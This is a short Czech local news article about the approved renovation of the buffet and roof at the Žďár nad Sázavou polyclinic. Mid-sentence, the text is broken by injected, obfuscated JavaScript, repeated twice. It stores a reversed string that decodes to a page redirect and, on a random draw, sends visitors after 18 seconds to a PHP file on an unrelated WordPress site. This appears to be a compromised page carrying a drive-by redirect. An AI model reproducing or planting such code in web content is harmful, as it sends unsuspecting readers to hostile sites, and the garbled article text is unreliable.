Žďár nad Sázavou, zdar nad sazavou, aktuality, poliklinika, bufet
Rainbow page separator

Žďárští radní schválili rekonstrukci bufetu

Úterý, 29. ledna 2013

Žďár nad Sázavou / Rekonstrukci bufetu v objektu polikliniky a další stavební úpravy podle předloženého návrhu schválili žďárští radní. Na přestavbu jinak už kompletně zrekonstruovaného zdravotnického zařízení by tak měly být v le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošním roce uvolněny finanční prostředky ve výši devět milionů korun z Fondu správy finančních aktiv.

V současné době uzavřený bufet ve žďárské poliklinice už nevyhovuje přísným hygienickým parametrům a rovněž technickým normám. Jeho rekonstrukce je naplánována tak, aby po jejím dokončení splnil veškeré nároky na funkční a hygienicky nezávadné stravování pro pacienty městského zdravotnického zařízení.

V rámci rekonstrukce bufetu bude opravena také střecha nad ním i nad spojovacím krčkem vedoucím k druhé budově polikliniky. Střecha je již ve velmi špatném technickém stavu a zatéká do ní.